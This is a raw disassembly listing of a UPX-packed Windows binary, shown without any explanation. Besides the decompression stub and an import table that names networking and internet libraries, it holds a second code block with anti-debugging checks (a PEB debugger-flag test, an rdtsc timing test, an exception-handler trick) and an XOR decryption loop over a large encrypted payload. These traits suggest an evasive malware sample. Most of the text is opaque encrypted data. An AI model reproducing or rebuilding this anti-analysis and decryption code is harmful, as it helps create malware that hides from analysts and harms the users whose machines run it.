dd 8117F42h, 0B7B21C98h, 899D9CE7h, 0FFFFFFFFh, 971A3D77h
dd 5029A4D3h, 3A96A58Dh, 0E8FC8D46h, 10EB1612h, 457044AFh
dd 966AD0F8h, 439FB178h, 0FFFFF56Fh, 0A827EB51h, 8A397086h
dd 0C214DE09h
dd 7A53C1A1h, 85C4BF16h, 29E70F90h, 0D1BC4BFFh, 898E9E98h
dd 714FE53h, 0A3ECCA94h, 1DA11E75h, 0FFFFFFF8h, 0C5B4E8F9h
dd 0DB1A4ECBh, 3969D7F0h, 948C1A87h, 1318C67Bh, 0BF3EB382h
dd 67E0424Bh, 0FFFFFEEBh, 0B737A217h, 0D8B3AA60h, 48022D7h
dd 4BA67A65h, 855886FFh, 0F96EF645h, 7C956EEh, 800DFFD3h
dd 0A63B4A32h, 0D3D87AB7h, 233263EBh, 0FBA5CD34h, 31505FF0h
dd 31BC03D8h, 0D96888A4h, 48D34D34h, 0E8041C2Ch, 9A69A65Eh
dd 0A4BCCC66h, 0A1748094h, 64709A69h, 2E9F7150h, 85D3B46Dh
dd 5754BB6h, 392E6CDCh, 92161600h, 0D64B72Dh, 67AD6BC5h
dd 0CB5B6C6Dh, 866E511Ch, 5E722C75h, 2F80F856h, 79627A6Fh
dd 726241D9h, 386DB612h, 0C79A414h, 35A35879h, 4A38D6B0h
dd 9DB6BA67h, 6178EB63h, 7578732Eh, 16466E27h, 4223472Eh
dd 0A0673D1Bh, 1A5D2FCAh, 6C2836C0h, 701A671Ch, 82E78D6Fh
dd 7A2E11BDh, 33091361h, 61C737FEh, 5F1361B3h, 7543676Fh
dd 0D33AE6Bh, 0D85E7720h, 7E541F74h, 6364DEC8h, 6F6C1FA5h
dd 0B5612D73h, 58F5ACADh, 0E320972Eh, 0D95B5D75h, 166C9BD6h
dd 0B92FBE62h, 9EF60466h, 6C667292h, 85330E61h, 67FF2536h
dd 2E7A6172h, 876D7461h, 0C0573536h, 0CA2D77C0h, 0ED751ED5h
dd 0CB3EDDBFh, 66216362h, 6B6ABF67h, 6F6E6D6Ch, 0FF527170h
dd 7485F52Fh, 79787792h, 4241E97Ah, 46454443h, 4A494847h
dd 6D2C504Bh, 51FC4E2Ch, 0C0A95440h, 582FBDABh, 0B81B5A59h
dd 81107790h, 20387AD6h, 5707B62Ah, 0A074AB7Bh, 0CACBEF8Ch
dd 13204B43h, 625B27Bh, 0B531650h, 0A474E4Fh, 374AFD2Eh
dd 3407490Bh, 4F4A9235h, 0D61F9240h, 55512F0Ch, 0B1DB5449h
dd 561AB5B7h, 1166477Bh, 79B57423h, 72FB8165h, 75F8417h
dd 70342E92h, 0E32820E0h, 3B6462F3h, 6B561820h, 454934DFh
dd 9153620h, 83762F1Eh, 3035A405h, 776B0029h, 0B80B735Ah
dd 2C610371h, 0DB5C4D02h, 7E75D34h, 7C03690Fh, 13312D65h
dd 84094514h, 0D37FCBD7h, 4009C45Dh, 74736C01h, 706D6372h
dd 4A2B4741h, 7465FFF7h, 61636F4Ch, 6E49656Ch, 530F6F66h
dd 0AD8A5B62h, 63194438h, 0AC15798Fh, 57A29741h, 34466569h
dd 23DCCB30h, 6954AE45h, 760B0E6Dh, 54DECD06h, 15206Fh
dd 7B1E4146h, 0D0CB2D0h, 646F4D3Fh, 215F96C9h, 614E2DBCh
dd 37A8E41h, 4169D80Bh, 0FF1F7E5Eh, 0DF0577BDh, 706F4309h
dd 69933879h, 6578456Eh, 720F7683h, 6F7E8151h, 50669A6Ch
dd 33707FFBh, 616E5332h, 6F687370h, 0D6D31974h, 12D6EEA0h
dd 0F737232h, 7D35C654h, 2CB982C0h, 654E2118h, 573B7478h
dd 7068837Ch, 0B06E4972h, 5CC3656Bh, 0A64B6D1h, 6A7F6163h
dd 0DC1E5B62h, 150C7645h, 53A14661h, 35BDCD88h, 624F910Ah
dd 4414AF6Ah, 509B3CB0h, 4CCD2BF5h, 0D8764561h, 2650AD66h
dd 656E165Dh, 97C24B06h, 6E7065ECh, 9B774711h, 25CFF628h
dd 64410B12h, 830F7264h, 2D1BE12Dh, 7262694Ch, 4D2B9261h
dd 686708DCh, 789E289Eh, 44964865h, 0A8274687h, 166CC2D4h
dd 701D7510h, 2D9744ABh, 7550DEB4h, 44EC4DD8h, 78E8B849h
dd 0DCD5141h, 0D923308Bh, 6201226Ah, 30879587h, 3178450Ch
dd 0C9785D52h, 82D0570h, 9C657A22h, 4886F66Ch, 0EA2F0Fh
dd 6EECDAD1h, 79227842h, 0A9277470h, 1582FB6Ch, 440A10C4h
dd 300E6112h, 0FCD0776Ch, 53796669h, 0A1BCA67h, 4C3357B1h
dd 6F4E7916h, 0BEC1879h, 4B112C7Bh, 52107965h, 66D17876h
dd 3E651E9Ch, 0D87114EFh, 63413F90h, 72697571h, 759B494Dh
dd 538FA16Fh, 67CE3A74h, 19430D92h, 41B69B62h, 93E0410h
dd 0FB0ED6Bh, 11350A51h, 0EC0466Ch, 2117301Ch, 598458EEh
dd 415FAC10h, 44686962h, 53F519E1h, 0DDBF8268h, 11D0B34Eh
dd 78F8DE13h, 72FD696Fh, 6105F977h, 469736Eh, 5F736F63h
dd 705F4845h, 0ADBBD2A6h, 0B6744DCh, 7878435Fh, 1F604C6Ch
dd 6BDE098Eh, 85076859h, 70E4DAE6h, 0E22A4279h, 0CEC73572h
dd 685FDD6Eh, 73293328h, 0DB0C7274h, 0D11CE66h, 366D4906h
dd 7316DB36h, 74AC0FB1h, 13CE994h, 6DADC669h, 8B7C7377h
dd 5496674h, 0A08668A4h, 7F3A3965h, 5A1586CDh, 210BE514h
dd 98CC20EDh, 49F6200Bh, 0E2B84F64h, 50F49A74h, 16C0B76Fh
dd 55353DB6h, 0E114173h, 465B0DC1h, 0BB5D115Bh, 0A992E8B1h
dd 53AB7D6Eh, 0D6CB6574h, 64527555h, 80212CAh, 0B2CB2C73h
dd 10D022Ch, 2CB26F39h, 340BB2CBh, 80090C17h, 4CB2CB2h
dd 9161013h, 5733D528h, 0B72F4550h, 7C83FDB3h, 40D3167Eh
dd 10F00E0h, 0C06010Bh, 0E02F7334h, 0B131259h, 3530E51Dh
dd 1B180125h, 6B020B31h, 9BA4B733h, 1E700C07h, 364B1C34h
dd 60710B0h, 2E3B4803h, 8CB15840h, 4EFB648Fh, 1B0D857h
dd 26042E1Eh, 0C1189033h, 0C43406C0h, 9DB906C0h, 2EE0043Eh
dd 0BDFB9064h, 0DC01211h, 3827E90Bh, 6000C038h, 1B6C3000h
dd 2C033D43h, 96h, 0
dd 0FF24h, 3 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_31506000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31508412
; ---------------------------------------------------------------------------
align 8
loc_31508408: ; CODE XREF: UPX1:loc_31508419�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_3150840E: ; CODE XREF: UPX1:315084A6�j
; UPX1:315084BD�j
add ebx, ebx
jnz short loc_31508419
loc_31508412: ; CODE XREF: UPX1:31508400�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508419: ; CODE XREF: UPX1:31508410�j
jb short loc_31508408
mov eax, 1
loc_31508420: ; CODE XREF: UPX1:3150842F�j
; UPX1:3150843A�j
add ebx, ebx
jnz short loc_3150842B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150842B: ; CODE XREF: UPX1:31508422�j
adc eax, eax
add ebx, ebx
jnb short loc_31508420
jnz short loc_3150843C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31508420
loc_3150843C: ; CODE XREF: UPX1:31508431�j
xor ecx, ecx
sub eax, 3
jb short loc_31508450
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_315084C2
mov ebp, eax
loc_31508450: ; CODE XREF: UPX1:31508441�j
add ebx, ebx
jnz short loc_3150845B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150845B: ; CODE XREF: UPX1:31508452�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31508468
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508468: ; CODE XREF: UPX1:3150845F�j
adc ecx, ecx
jnz short loc_3150848C
inc ecx
loc_3150846D: ; CODE XREF: UPX1:3150847C�j
; UPX1:31508487�j
add ebx, ebx
jnz short loc_31508478
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508478: ; CODE XREF: UPX1:3150846F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_3150846D
jnz short loc_31508489
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_3150846D
loc_31508489: ; CODE XREF: UPX1:3150847E�j
add ecx, 2
loc_3150848C: ; CODE XREF: UPX1:3150846A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_315084AC
loc_3150849D: ; CODE XREF: UPX1:315084A4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_3150849D
jmp loc_3150840E
; ---------------------------------------------------------------------------
align 4
loc_315084AC: ; CODE XREF: UPX1:3150849B�j
; UPX1:315084B9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_315084AC
add edi, ecx
jmp loc_3150840E
; ---------------------------------------------------------------------------
loc_315084C2: ; CODE XREF: UPX1:3150844C�j
pop esi
mov edi, esi
mov ecx, 0C8h
loc_315084CA: ; CODE XREF: UPX1:315084D1�j
; UPX1:315084D6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_315084CF: ; CODE XREF: UPX1:315084F4�j
cmp al, 1
ja short loc_315084CA
cmp byte ptr [edi], 1
jnz short loc_315084CA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_315084CF
lea edi, [esi+6000h]
loc_315084FC: ; CODE XREF: UPX1:3150851E�j
mov eax, [edi]
or eax, eax
jz short loc_31508547
mov ebx, [edi+4]
lea eax, [eax+esi+8000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+808Ch]
xchg eax, ebp
loc_31508519: ; CODE XREF: UPX1:3150853F�j
mov al, [edi]
inc edi
or al, al
jz short loc_315084FC
mov ecx, edi
jns short near ptr loc_3150852A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_3150852A: ; CODE XREF: UPX1:31508522�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+8090h]
or eax, eax
jz short loc_31508541
mov [ebx], eax
add ebx, 4
jmp short loc_31508519
; ---------------------------------------------------------------------------
loc_31508541: ; CODE XREF: UPX1:31508538�j
call dword ptr [esi+8094h]
loc_31508547: ; CODE XREF: UPX1:31508500�j
popa
jmp loc_31501D0B
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 00010000 ( 65536.)
; Section size in file : 00010000 ( 65536.)
; Offset to raw data for section: 00009000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31509000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 90C4h, 908Ch, 3 dup(0)
dd 90D1h, 909Ch, 3 dup(0)
dd 90DEh, 90A4h, 3 dup(0)
dd 90E9h, 90ACh, 3 dup(0)
dd 90F4h, 90B4h, 3 dup(0)
dd 9100h, 90BCh, 5 dup(0)
dword_3150908C dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA dd 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C4D444h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 69730000h
dd 6Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
pop ebx
call loc_3150925F
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:3150920F�j
; DATA XREF: sub_315148B3+6�w
jmp short near ptr loc_3150920A+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_3150925E
call $+5
pop ebp
sub ebp, 402320h
mov eax, [ebp+402367h]
add eax, [ebp+40236Fh]
mov esi, eax
mov eax, [ebp+40236Bh]
add eax, [ebp+40236Fh]
push eax
mov edi, esi
xor ecx, ecx
loc_3150924D: ; CODE XREF: UPX2:3150925C�j
lodsb
xor al, [ebp+402377h]
stosb
inc ecx
cmp ecx, [ebp+402373h]
jl short loc_3150924D
locret_3150925E: ; CODE XREF: UPX2:31509220�j
retn
; ---------------------------------------------------------------------------
loc_3150925F: ; CODE XREF: UPX2:31509201�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], ah
add al, dh
add dword ptr [eax], 0
; ---------------------------------------------------------------------------
dw 0
dd 26003150h, 280000h, 760h dup(0)
; ---------------------------------------------------------------------------
call $+5
clc
mov eax, [esp]
cld
mov [eax+2FCFh], ebx
test dword ptr [eax+288Ah], 80000000h
mov ebx, [esp+4]
jz short loc_3150B04D
pop ecx
mov [eax+2FD3h], esi
push edi
pop dword ptr [eax+2FD7h]
cmp byte ptr [eax+288Eh], 0E8h
jnz short loc_3150B044
add ebx, [eax+288Fh]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_3150B04C
; ---------------------------------------------------------------------------
loc_3150B044: ; CODE XREF: UPX2:3150B035�j
mov ebx, [eax+2890h]
push dword ptr [ebx]
loc_3150B04C: ; CODE XREF: UPX2:3150B042�j
pop ebx
loc_3150B04D: ; CODE XREF: UPX2:3150B01E�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 1E05h
sub ebp, 361005h
mov edi, [esp+4]
lea esi, [ebp+36389Ch]
mov ecx, 99h
rep movsb
call sub_3150B0C2
mov ecx, eax
call sub_3150B0C2
sub eax, ecx
jz short loc_3150B096
cmp eax, 100h
lea eax, [ebp+3610D5h]
ja short loc_3150B096
mov dl, [eax-10h]
call sub_3150B0C6
jmp short loc_3150B0D5
; ---------------------------------------------------------------------------
loc_3150B096: ; CODE XREF: UPX2:3150B07D�j
; UPX2:3150B08A�j
test dword ptr [ebp+36388Fh], 80000000h
jz short loc_3150B0C0
lea esi, [ebp+363893h]
mov edi, [esp+4]
movsb
movsd
mov esi, [ebp+363FD8h]
mov edi, [ebp+363FDCh]
mov ebx, [ebp+363FD4h]
loc_3150B0C0: ; CODE XREF: UPX2:3150B0A0�j
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_3150B0C2 proc near ; CODE XREF: UPX2:3150B06F�p
; UPX2:3150B076�p
rdtsc
retn
sub_3150B0C2 endp
; ---------------------------------------------------------------------------
db 82h
; =============== S U B R O U T I N E =======================================
sub_3150B0C6 proc near ; CODE XREF: UPX2:3150B08F�p
mov dh, dl
mov ecx, 27BAh
loc_3150B0CD: ; CODE XREF: sub_3150B0C6+C�j
; UPX2:3150B0D9�j
xor [eax], dl
add dl, dh
inc eax
loop loc_3150B0CD
retn
sub_3150B0C6 endp
; ---------------------------------------------------------------------------
loc_3150B0D5: ; CODE XREF: UPX2:3150B094�j
add esp, edi
xchg bh, al
jnz short near ptr loc_3150B0CD+1
packssdw mm3, mm4
inc eax
; ---------------------------------------------------------------------------
db 0FEh
dd 9668E971h, 0A72449A1h, 4159AA28h, 0F53771BBh, 86BDDC04h
dd 2A318710h, 0CD349AC3h, 0F6265983h, 0DD4490D3h, 0E5C9B393h
dd 96ED8CABh, 83248672h, 0FB047B71h, 62C561EFh, 0E46E0FFCh
dd 3F574FC9h, 6C173E94h, 0D5A77B84h, 60A89DA7h, 35A8483Bh
dd 0B988B143h, 4A2CB1C3h, 0DCC4AC8h, 33A73DBCh, 3AB23B90h
dd 35E4078Ch, 0EB65BC17h, 76C249C2h, 7EFC7710h, 0E376C100h
dd 0CB69FE69h, 0E27AF766h, 614F9A59h, 90A12BF6h, 462C9C13h
dd 0B634B23Dh, 0F248DF7Fh, 8330B121h, 0BC23B83Ah, 0AB8150h
dd 0E5665FD1h, 258CE256h, 6B6CEA6Bh, 0F5F0FDB0h, 0AE830587h
dd 3DBE977Fh, 0CE090ABEh, 1515979Fh, 0A31C1A98h, 2692378Eh
dd 0D1B85FA9h, 8BE605h, 1031C4B8h, 0C9C474D5h, 78D9C24Dh
dd 0D5D3B9D0h, 68C9D27Dh, 0C36762E0h, 6EDA7F90h, 0A51F1F0h
dd 7EFC4CEDh, 93842783h, 0D90C8A3Eh, 84C717D6h, 171D9A2Eh
dd 901F9C95h, 5A992728h, 85348425h, 0F48137F1h, 7744F47Bh
dd 0CDC22268h, 290BD250h, 0E86750CDh, 0F98C2360h, 0EEB86E67h
dd 0B1FFF270h, 0FD3C906Ch, 16846A43h, 8B050288h, 16A229D2h
dd 1EF3EEF0h, 0D9A448A0h, 1897E83Dh, 3974B7B0h, 3EBED43Ch
dd 0F349D5C0h, 4EFA5AC8h, 0AB6DBD5Bh, 0DFDC5AD3h, 50F4620Dh
dd 3D79E7E8h, 85F444E2h, 0FD1E855Dh, 7A8FA2ECh, 4E3F8262h
dd 0AB811F49h, 6D1CAC03h, 2FD8298Bh, 0E9D2BA7Fh, 0B55CE52Ch
dd 413CBB38h, 0F07F80D5h, 0EE884948h, 525B12D5h, 0DE5CD8C7h
dd 8C6488F7h, 0EA6C8269h, 0F61C7270h, 17CFB78h, 30BF4015h
dd 14C8F88h, 16969014h, 4E9C7098h, 22A422C8h, 0EFAC40A8h
dd 5CE33E58h, 3FD46AB9h, 0B9C443C0h, 78F7085Dh, 56DE3AD0h
dd 0CB235AD9h, 66D259A2h, 6EEC6F00h, 74A59BF0h, 7E967AF8h
dd 0EC0E6159h, 38997502h, 7D14A42Bh, 239F59E9h, 0A6129942h
dd 9AA8A528h, 5E34B232h, 0BE3CBA3Eh, 8A00960Eh, 5BB3CA04h
dd 0D662E92Eh, 0C9926FD5h, 2F57E256h, 0D5A657E5h, 0F8C5F246h
dd 0FC0A12EBh, 0BB070280h, 0EBA3176h, 16101D90h, 959C1A9Ah
dd 109FEC25h, 2FDCD5A8h, 152B73Fh, 0BB373A8Eh, 46F27926h
dd 0C1CD3A37h, 60EC6155h, 8C59D1D8h, 99E454DBh, 0EB636B98h
dd 76C24ACAh, 452AF773h, 9CE78236h, 10DFBF7h, 0A02CD595h
dd 40911118h, 4524941Bh, 0AF5D5521h, 8E6037BFh, 6D4BA0Eh
dd 4B44C241h, 0F8709EF5h, 0BC9B5950h, 21852C58h, 7E7E610h
dd 0ED2C806Bh, 0F61EA589h, 4BF1E212h, 6B2175Bh, 0E8C1331h
dd 5B909F90h, 0E163E566h, 222989C6h, 2EAC2AE5h, 0BB1F54B0h
dd 0C173EFFh, 4651CF24h, 0E2CC7CF3h, 30D6DBB6h, 5C1ED973h
dd 0B26F9702h, 9A846A82h, 0FDF4729Fh, 0F5FC1034h, 0EE04E8C4h
dd 860C8A08h, 0C445D27Ah, 614C9472h, 901F78B5h, 6AAFF228h
dd 0D9C0DA70h, 6AB7BA38h, 0ACFC22Ah, 0CE268A22h, 0BC06D03Ah
dd 0B1A8B258h, 0E60EE260h, 0BE938039h, 0CD96678Fh, 0A723FA4Eh
dd 828BFD05h, 0E8C0B8Fh, 694A71Dh, 0E3251AAEh, 0ADA422ABh
dd 0AF09D947h, 0A4325Dh, 739B7B8h, 0B9C474D4h, 24981A28h
dd 0A92B38F0h, 68E7B04Dh, 3924E7E0h, 3E045E9Dh, 9EF472F1h
dd 7EFC7AE9h, 0E340E753h, 0DE6BFF6Ah, 0FF62FB62h, 0FB7BFF74h
dd 0F7CCF520h, 512CAA2Dh, 800BEA85h, 0D0A94538h, 9144F47Bh
dd 0F57E5FB7h, 0D63ED266h, 4BA3D832h, 0E652D902h, 0EE6DC2D1h
dd 175F6570h, 0AA58F6F1h, 0A011FDD7h, 3D8C3CB3h, 54319166h
dd 1E9C2CA4h, 0B35B75F4h, 2E9A1102h, 50C0F235h, 3A42B9FEh
dd 323BACB2h, 4EA642ECh, 0C32B78BAh, 5EEA617Ah, 0BA90A265h
dd 6B65827Bh, 0BFC772F0h, 47C69969h, 0B038C085h, 0F3EFF08h
dd 0F530B66Ch, 0EA6FE86Bh, 3EE52308h, 0FE2CAA26h, 0E762E264h
dd 416FEA68h, 0F07F98D5h, 978C4F48h, 0A2ABDD24h, 5BD3D27Ch
dd 0E652DE22h, 11912F80h, 638BA18Fh, 0FE4AC14Ah, 0C2058C6Bh
dd 0E8C0BA0h, 2401EDC7h, 0E19C2CA3h, 109F1035h, 0D5C4C3A8h
dd 6CB4CD4Fh, 3ED63AD2h, 46AE42AAh, 4ACC4BA0h, 3C10D9D0h
dd 52B60AD8h, 841BA66Bh, 5AB312BEh, 0BFC772F0h, 8103A010h
dd 0CE910FFFh, 0DC0CBC1Dh, 6944C341h, 0A827AC8Dh, 86E02120h
dd 0AE6527EBh, 0B66CEA68h, 0BE3C95CCh, 0C644CC23h, 0CE4CCA49h
dd 0D654D250h, 0DE5CDA58h, 0E664CAEFh, 0EE6CEA68h, 927A421h
dd 0C847C4EDh, 0AADDA980h, 0F5F9CA0Ch, 9B57FC72h, 28856F0Dh
dd 0B35B70A0h, 2E9A113Eh, 9ECB739h, 28543A8Eh, 0AC442C0h
dd 3BA725A7h, 3FA602A0h, 3BB033AEh, 7B20787h, 2F891F84h
dd 0E30B22F0h, 7ECA41C6h, 0B9580789h, 0D2CF8A3Eh, 0F367F352h
dd 0FB71FB56h, 0CC46ED44h, 0DD58C94Dh, 0E540E46Ch, 0BE48D95Dh
dd 0B430B12Ch, 0CE22AF24h, 0B731A013h, 0B71ABF2Ch, 0E625870Ch
dd 8F09982Bh, 9F329704h, 9F319F14h, 68ED72F0h, 4D8C4BEFh
dd 62F577E2h, 71EE4AFDh, 55D747C3h, 5CEF2AE9h, 53C053D5h
dd 51D15FEAh, 2E9027B4h, 2AAD2FBAh, 33A611D0h, 0AB92EB9h
dd 7811088h, 1CAF6A8Ch, 13801395h, 129315ACh, 0F668E768h
dd 0E05FB83Bh, 0FE67E271h, 0DB1CEE77h, 0F250CB58h, 0CF49D840h
dd 0DF72B254h, 0D768DF54h, 0A910A72Dh, 0BA3FB31Bh, 0BF00BF35h
dd 985CBF35h, 0AA018712h, 8F1E8801h, 0B1748B02h, 973A8E1Dh
dd 72C567ECh, 6CE578FCh, 65F166E5h, 7BDB1AD9h, 4ACD64D4h
dd 54C579CDh, 53F332D5h, 52D57CCCh, 2BAD16A5h, 2B8B4AADh
dd 32BB1FA4h, 16B936ADh, 0A800C81h, 29EC2B8Dh, 13A00695h
dd 17BA0A95h, 0E74AE76Ch, 8E4DEF65h, 0C260F757h, 0CE6CF77Dh
dd 0E74CD641h, 0DA49ED28h, 0C546D766h, 0BE52D551h, 9030A707h
dd 0A73FB82Dh, 0AE11BC3Fh, 0BB1BDA19h, 8A0BB414h, 0A709871Dh
dd 841B941Eh, 97089B15h, 6C56CEFh, 6AED65C4h, 64F67BDCh
dd 5FE568F9h, 56C56FA0h, 59C943FEh, 5FF254FFh, 71BC5FD4h
dd 0AA27B0h, 3A926A1h, 3FA422B1h, 5E9D3DB6h, 88112AFh
dd 0D8318B8h, 76870195h, 1D9308A8h, 0B577F165h, 0FC65CC3Ah
dd 0C614E663h, 0FB7FF56Ah, 9417D153h, 0DA54CF66h, 0C251E130h
dd 0DB50D37Eh, 0B430B601h, 0BA39A821h, 0D615A135h, 9828BF0Bh
dd 0B2018E09h, 0EE098701h, 93119E23h, 872FFA08h, 6BE176F3h
dd 6BE163DCh, 7FD27DC4h, 77C87FF4h, 73A447CDh, 5ECD47C6h
dd 41D15BE6h, 57FA5CF7h, 10C427ACh, 3BB838A1h, 3A953EB1h
dd 5EBF35B4h, 128D10B7h, 2852C8Dh, 2BA7295h, 0B961EB9h
dd 0F454F673h, 0E265FC61h, 0E571F575h, 0FB77F54Ch, 0D26AA24Eh
dd 0CF49D86Bh, 0DF72D744h, 0F03CDF54h, 0A3368134h, 9E29BE29h
dd 0B337BD22h, 905CA92Bh, 8316A114h, 0BE099E09h, 93179D02h
dd 8639890Bh, 45F04C80h, 7AED6FFAh, 75F141F5h, 70F373ECh
dd 65D06CA0h, 5ACD4FDAh, 53C767D5h, 51CE6ACAh, 35B727A3h
dd 3B804C8h, 3F8222B1h, 38932DBDh, 128707B3h, 6E820581h
dd 6BB06BEh, 17BA149Dh, 0C804E76Ch, 0EB7CC57Ch, 0F966C27Eh
dd 0ED6FFF7Bh, 0C34FCD74h, 0DA62AA46h, 0D851C27Fh, 0CA5FDF6Bh
dd 0C62AAD29h, 0BC1CBE06h, 0B531A63Fh, 0AC358C2Ch, 8A059714h
dd 81018F25h, 0B8748B02h, 9B09AB0Ch, 68CD7BF2h, 63FE65EEh
dd 79FD66F1h, 75F34EF6h, 68A44CC5h, 47DE7DDCh, 5FE257C4h
dd 5FC94ECAh, 2BA10FACh, 4EB538A7h, 3B82682h, 31BF33B6h
dd 12B70784h, 982039Ah, 18B51DA4h, 0AAF138Bh, 0E16AEB72h
dd 0CF5FDD08h, 0E475E643h
dd 9E6CEF6Ch, 0D54BCE43h, 0CD43D94Dh, 0B640D75Bh, 0D052D55Bh
dd 0C630A125h, 0A638AF2Fh, 0B420A13Fh, 0B33DB421h, 8316E205h
dd 9D6C9C0Bh, 0F6109C15h, 951F950Bh, 4F8476E5h, 7CE97EE6h
dd 55E077FEh, 7BEF75F4h, 42CA43E8h, 67AC4FC4h, 44D146DEh
dd 79C85FD6h, 298736A5h, 2DA924A6h, 5B037A4h, 3BA83BACh
dd 128A2BE0h, 0B82188Dh, 13843D84h, 37FC3B96h, 0F461F66Eh
dd 0C178EF66h, 0C37AF760h, 9E5DF66Ah, 0C350CC69h, 0DA49C45Ah
dd 0D255D762h, 0DB50D37Eh, 90008340h, 0FD059A09h, 9A10FC62h
dd 0BB0EDA14h, 8908A107h, 8B278F1Bh, 9326F209h, 9B0CB51Fh
dd 7FE149EEh, 0ECD72CDh, 47F377C2h, 67EE7FEDh, 53C843F6h
dd 6FD46FCDh, 51D160B0h, 68C85FEBh, 23B12EA1h, 4E8D328Dh
dd 3C226186h, 0D58A0CDAh, 34E50834h, 38F41817h, 49A8E70Fh
dd 0BA777ACEh, 0D652D456h, 967C755Eh, 0ADDE07EFh, 5A9F9A2Eh
dd 0AEE6FC30h, 55652728h, 0DE657A1Bh, 563CBA38h, 0C5608ECDh
dd 0CB26CA22h, 0BC078201h, 8E90515Dh, 0B23436EBh, 0BC3DAA02h
dd 4E10D23h, 7D7CCC43h, 937B0E44h, 0EBA3172h, 0D59CD613h
dd 259C8F15h, 0EF972296h, 46FE2AC2h, 36863280h, 6FEDFE33h
dd 179402AAh, 8E4F52A2h, 58BE06D8h, 0B049A588h, 0E5E454DBh
dd 0BCDF4A2Ch, 0EFFBB275h, 26268D3Ah, 0D1C74023h, 4FE4753Bh
dd 99EB6DEFh, 9E1C3F9Ch, 524CF220h, 252CAA47h, 3D34D8E4h
dd 0D67CD0F4h, 0C654C240h, 0A41EC822h, 0B9A0BA50h, 0DE36DA58h
dd 1934B131h, 0D85708FDh, 92DAD70h, 0C847C8EDh, 727B8780h
dd 8E0181F9h, 0F5942485h, 1E099794h, 25A414B0h, 0D1FF7D79h
dd 0F831B962h, 0B3BC0C83h, 46E3A74Fh, 0B1E7A2C8h, 0D35FAD2Fh
dd 5EEA613Eh, 4ED6ED6Dh, 74046AE8h, 0FD0B8D0Fh, 48C7A87Dh
dd 0BF8B0F00h, 660C8A20h, 69EB6D19h, 0A5CA1F93h, 66A1A216h
dd 21A18A5Ch, 0B6349A76h, 41C24ED0h, 18C149BFh, 4B4CFC73h
dd 5B5FA690h, 0DE7489D7h, 18BB0A60h, 29E71597h, 1E21312Fh
dd 0FE7CFA78h, 126983DDh, 3D8C3C93h, 8E119F59h, 4F9C2C86h
dd 76F573F4h, 0BB537BF9h, 368209EEh, 0C1983E3Fh, 70FF7055h
dd 4A0E17C8h, 563C07D0h, 3DC5AD8h, 7DA78F61h, 91866ADEh
dd 6DFAE77Dh, 2CAC7ACEh, 8620A2CDh, 4A8F8A22h, 13D3F41Ch
dd 9E2A814Ch, 23E382EDh, 0AE1AB17Eh, 0B61EB214h, 0A4567965h
dd 0C64D2A18h, 8CC1CA48h, 1FAA7831h, 0B79F2A2Dh, 0D058AEF5h
dd 0E6E8EF68h, 63FDB078h, 0FE4AC634h, 5347E077h, 0E8C0A60h
dd 0FB154F90h, 1EAA0105h, 1AF4BF2Bh, 522F2A9Eh, 39B43A94h
dd 3EBC833Ch, 4E28C3C0h, 1ACC4ACAh, 56D556B8h, 0D849A5D8h
dd 0EDE454DBh, 4A68E714h, 76F473F4h, 96FC10A8h, 86048204h
